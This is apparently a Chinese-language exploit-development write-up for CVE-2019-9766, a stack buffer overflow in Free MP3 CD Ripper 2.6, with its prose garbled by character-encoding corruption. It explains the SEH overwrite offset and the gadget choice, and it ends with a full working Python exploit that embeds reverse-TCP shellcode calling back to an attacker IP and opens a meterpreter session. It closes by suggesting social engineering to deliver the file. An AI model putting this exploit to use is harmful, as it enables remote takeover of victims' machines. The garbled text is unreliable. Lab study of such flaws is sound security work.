Ç°ÑÔ
CVE-2019-9766ÆسöÁ˹ØÓÚFree MP3 CD RipperµÄ»º³åÇøÒç³ö©¶´£¬ÔÚת»»Îļþʱ£¬Free MP3 CD Ripper 2.6ÖлùÓÚ¶ÑÕ»µÄ»º³åÇøÒç³ö©¶´ÔÊÐíÓû§¸¨ÖúµÄÔ¶³Ì¹¥»÷Õßͨ¹ýÌØÖƵÄ.mp3ÎļþÖ´ÐÐÈÎÒâ´úÂë¡£±¾ÎÄÏêϸÃèÊöÁ˸鶴µÄÑéÖ¤·½·¨£¬Éø͸ģ¿éµÄ±àд¼°²âÊÔ¹ý³Ì¡£
ÈçÐèÁ˽⩶´ÏêÇ飬Çë²ÎÕÕÈçÏÂURL£ºhttps://nvd.nist.gov/vuln/detail/CVE-2019-9766
ʵÑé»·¾³
- Éø͸Ö÷»ú£ºKali-Linux-2019.1-vm-amd64
- Ä¿±êÖ÷»ú£ºCN_Windows7_x86_sp1
- Èí¼þ°æ±¾£ºFree MP3 CD Ripper 2.6
Éæ¼°¹¤¾ß
- WinDbgx86-v6.12.2.633
- python-2.7.15
- ImmunityDebugger1.85
ʵÑé²½Öè
1. ÑéÖ¤¸Ã»º³åÇøÒç³ö©¶´
(1) ͨ¹ýpythonÉú³É×Ô¶¨ÒåµÄ.mp3Îļþ£¬ÕâÀォ10000¸ö×Ö·ûAת»»³É.mp3Îļþ£¬´úÂëÈçÏ£º
(2) ÔÚKaliÖÐÖ´ÐÐFmcrExploit.py£¬Éú³ÉTestFMCR.mp3Îļþ£¬ÈçÏÂͼËùʾ£º
(3) ½«TestFMCR.mp3¸´ÖƵ½Ä¿±êÖ÷»ú£¬´ò¿ªFree MP3 CD Ripper£¬ÔÙ´ò¿ªWinDbg£¬²¢½«WinDbg¸½¼Óµ½½ø³Ìfcrip.exe(Free MP3 CD RipperµÄ½ø³Ì)ÉÏ£¬ÈçÏÂͼËùʾ£º
(4) ÔÚFree MP3 CD RipperÖеã»÷“Convert”£¬Ñ¡ÖÐTestFMCR.mp3½øÐÐת»»£¬ÈçÏÂͼËùʾ£º
(5) ÔÚWinDbgÖÐÖ´ÐÐÃüÁîg£¬¿ÉÒÔ¿´µ½³ÌÐò·¢ÉúÁËÒì³££¬ÈçÏÂͼËùʾ£º
(6) ÔÙ´ÎÖ´ÐÐÃüÁî!exchain£¬²é¿´SEHÁ´ÐÅÏ¢£¬ÈçÏÂͼËùʾ£º
¾¹ýÉÏÊöÁù¸ö²½Ö裬ÎÒÃÇÈ·¶¨ÁË»º³åÇøÒç³ö©¶´µÄ´æÔÚ£¬²¢ÇÒÓÃ10000¸ö×Ö·ûA³É¹¦¸²¸ÇÁËSEH¡£
2. ±à䩶´ÀûÓóÌÐò
(1) ¶¨Î»³ÌÐòµÄÒç³öµã£¬¼´ÐèÒª¶àÉÙ¸ö×Ö·ûA²ÅÄܹ»¸²¸Çµ½SEH£¬Ê×ÏÈÉú³ÉÒ»¸ö³¤¶È10000ÇÒûÓÐÖظ´×Ö·ûµÄÎı¾£¬ÃüÁîÈçÏ£º
- root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000
ÄÚÈÝÌ«¶à£¬ÕâÀïÖ»½Øͼһ²¿·Ö£º
(2) ÓøÃÎı¾Ìæ»»FmcrExploit.pyÖеĔA”*10000£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ;
(3) Öظ´²½Öè1.3¡¢1.4¡¢1.5ºÍ1.6£¬·¢ÏÖPointer to next SEH record±»0×46326846¸²¸Ç£¬ÈçÏÂͼËùʾ£º
(4) ͨ¹ý0×46326846¶¨Î»³ÌÐòµÄÒç³öµã£¬¿ÉÒÔÖªµÀÖ»ÒªÌî³ä4116¸ö×Ö·û¾Í¿ÉÒÔ¸²¸Çµ½ Pointer to next SEH record£¬¾ßÌåÈçÏ£º
(5) ÑéÖ¤2.4Öеõ½µÄÒç³öµãÊÇ·ñÕýÈ·£¬½«FmcrExploit.pyÖеÄbuffer¸³ÖµÎª”A”*4116£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ£¬½«Îļþ¸´ÖƵ½Ä¿±êÖ÷»ú;
(6) ÔÚÄ¿±êÖ÷»úÖдò¿ªImmunityDebugger1.85£¬ÔËÐÐFree MP3 CD Ripper£¬convert²½Öè2.5ÖÐÉú³ÉµÄmp3Îļþ£¬µÃµ½ÈçϽá¹û£º
¿ÉÒÔ¿´µ½4116¸ö×Ö·ûAÕýºÃ¸²¸Çµ½ÁËPointer to next SEH record£¬¶¨Î»³É¹¦¡£
(7) Pointer to next SEH record(¼ò³Ænseh)£¬Ö¸Ê¾ÏÂÒ»¸öseh½á¹¹µÄλÖã¬ÕâÀïʹÓÔ\xeb\x06\x90\x90″Ìî³ä£¬ÕâËÄ×Ö½Ú·´»ã±àµÄ½á¹ûÊÇjmp 6¡¢nop¡¢nopÈýÌõÖ¸Ájmp 6±íʾÌø¹ý6¸ö×Ö½Ú£¬¸ÕºÃÌø¹ýÁ½¸önopÖ¸ÁîºÍÒ»¸ö4×Ö½ÚµÄseh´¦Àí³ÌÐòµØÖ·£¬È»ºóÂäÈënopÖ¸ÁîÇø£¬»¬ÐнøÈëshellcode¡£
(8) ±¾ÀýÖÐÎÒÃÇÒª½áºÏʹÓÃsehÓënseh£¬²ÅÄܹ»Íê³ÉÒç³ö¹¥»÷µÄÈ«²¿¹ý³Ì£¬Á÷³ÌÈçÏ£º
(9) Ñ°ÕÒpop pop retÈýÌõÁ¬ÐøÖ¸ÁîÊÇÒ»¸öÄѵ㡣ÔÚxpÖÐÕâ¸ö¹ý³Ì»á¼òµ¥ºÜ¶à£¬µ«ÊÇwin7¼°¸ü¸ß°æ±¾µÄϵͳÖмÓÈëÁËsafeseh¡¢ASLRµÈ°²È«±£»¤´ëÊ©¡£°ì·¨×ܱÈÀ§ÄѶ࣬½â¾ö°ì·¨Ò²ÊÇÓеġ£ÔÚImmunityDebugger1.85Ö´ÐÐÃüÁî!mona seh£¬½á¹ûÈçÏ£º
(10) ÃüÁî!mona sehµÄÊä³ö½á¹ûÔÚseh.txt(¸ÃÎļþÔÚImmunityDebugger1.85µÄ°²×°Ä¿Â¼ÏÂ)ÖУ¬ÔÚÆäÖÐÕÒµ½ÈçÏÂÒ»ÌõÐÅÏ¢£º
¿ÉÒÔ¿´µ½Õâ¸öpop pop retÖ¸ÁîÐòÁУ¬¶ÔÓ¦µÄÊÇÈí¼þ×Ô´øµÄdllÎļþ(C:\Program Files\Free MP3 CD Ripper\ogg.dll)£¬×¢ÒⲻҪʹÓÃϵͳ×Ô´øµÄdllÎļþ£¬¿ÉÄÜ»áÓÐASLR¡¢SafeSEH±£»¤¡£È»ºóÎÒÃǾͿÉÒÔÔÚFmcrExploit.pyÖиøSEH¸³Öµ “\x84\x20\xe4\x66″¡£
²¹³ä£ºcpuÖеØÖ·Êý¾ÝµÄ˳ÐòºÍÍøÂç¶Ë´«Ë͵ĵØַ˳ÐòÏà·´£¬´ËʱCPUÖеĵØÖ·Êý¾ÝΪ“0x66e42084”£¬ÄÇôÍøÂç¶Ë¾ÍÐèÒª°´“0x8420e466”À´´«Ë͵ØÖ·Êý¾Ý¡£
(11) ¶¨ÖÆÒ»¸öshellcode£¬ÕâÀïÎÒÃÇÖÆ×÷Ò»¸ö·´ÏòTCPÁ¬½ÓµÄshellcode£¬²Ù×÷ÈçÏ£º
(12) ´Ó2.11ÖпÉÒÔ¿´³ö£¬Éú³ÉµÄshellcodeΪ341×Ö½Ú£¬ÐèÒª¿¼ÂÇһϻº³åÇøµÄ´óСÊÇ·ñÄܹ»·ÅÈë¸Ãshellcode¡£¸ù¾ÝImmunityDebugger1.85µÄµ÷ÊÔ½á¹û£¬ÎÒÃÇÀ´¼ÆËãһϻº³åÇøµÄ´óС£¬µ÷ÊÔ½á¹ûÈçÏÂ(ÄÚÈݽ϶࣬½ÚÑ¡Ò»²¿·Ö)£º
- 040AFEBC 040AFEE8 èþ. Pointer to next SEH record
- 040AFEC0 004955CB ËUI. SE handler
- 040AFEC4 040AFED4 Ôþ.
- ......
- 040AFEE4 |00492C1A ,I. RETURN to fcrip.00492C1A
- 040AFEE8 |040AFF24 $ÿ. Pointer to next SEH record
- 040AFEEC |00492C24 $,I. SE handler
- ......
- 040AFFC4 |FFFFFFFF ÿÿÿÿ End of SEH chain
- 040AFFC8 |7769E0ED íàiw SE handler
- ......
- 040AFFF4 004047F4 ôG@. fcrip.004047F4
- 040AFFF8 01483044 D0H
- 040AFFFC 00000000 ....
0x 040AFFFC -0x 040AFEC4 =0×138£¬»»Ëã³ÉÊ®½øÖÆÊÇ312£¬ÄÇô»º³åÇøµÄ´óС¾ÍÊÇ312+4=316×Ö½Ú£¬ÏÔÈ»316×Ö½ÚÔõô¶¼·Å²»ÏÂ341×Ö½ÚµÄshellcode¡£
(13) µ½´Ë¾ÍÎÞ·¨¼ÌÐøÏÂÈ¥ÁËÂð?°ì·¨×ܱÈÀ§ÄѶడ£¬ÎÒÃÇ¿ÉÒÔ³¢ÊÔ°Ñshellcode½øÐÐѹËõ£¬²Ù×÷ÈçÏ£º
¿ÉÒÔ¿´µ½£¬¾¹ýѹËõÖ®ºó£¬shellcode±äΪ283×Ö½Ú£¬Äܹ»ÍêÈ«·ÅÈ뻺³åÇøÁË¡£
(14) »ã×ÜÒÔÉϲÙ×÷£¬±à¼FmcrExploit.py£¬´úÂëÈçÏ£º
- # Stack-based buffer overflow in Free MP3 CD Ripper 2.6
- buffer = "A" * 4116
- NSEH = "\xeb\x06\x90\x90"
- SEH = "\x84\x20\xe4\x66"
- nops = "\x90" * 5
- buf = ""
- buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
- buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
- buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
- buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
- buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
- buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
- buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
- buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
- buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
- buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
- buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
- buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
- buf += "\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
- buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
- buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
- buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
- buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
- buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
- buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
- pad = "B" * (316 - len(nops) - len(buf) )
- payload = buffer + NSEH + SEH + nops + buf +pad
- try:
- f=open("TestFMCR.mp3","w")
- print "[+] Creating %s bytes mp3 File..." %len(payload)
- f.write(payload)
- f.close()
- print "[+] mp3 File created successfully!"
- except:
- print "File cannot be created!"
3. Éø͸ģ¿é²âÊÔ
(1) ÔÚKaliµÄmsfconsoleÖÐÆô¶¯ÕìÌý¶Ë£¬µÈ´ýÄ¿±êÖ÷»úÉÏÏߣ¬²Ù×÷ÈçÏÂͼËùʾ£º
(2) ½«×îÖÕ°æFmcrExploit.pyÉú³ÉµÄTestFMCR.mp3Îļþ¿½±´µ½Ä¿±êÖ÷»ú£¬´ò¿ªFree MP3 CD Ripper£¬Convert¸Ãmp3Îļþ£¬È»ºómeterpreter session³É¹¦½¨Á¢£¬ÈçÏÂͼËùʾ£º
ÖÁ´Ë£¬Õë¶ÔFree MP3 CD Ripper 2.6»º³åÇøÒç³ö©¶´µÄÉø͸ģ¿éµÄ±àдºÍ²âÊÔ˳ÀûÍê³É!ÔÚʵսÖУ¬¿ÉÄÜ»¹ÐèÒª½áºÏÉ繤µÄ·½·¨£¬Ê¹mp3Îļþµ½´ïÄ¿±êÖ÷»ú¡£
¡¾±à¼ÍƼö¡¿
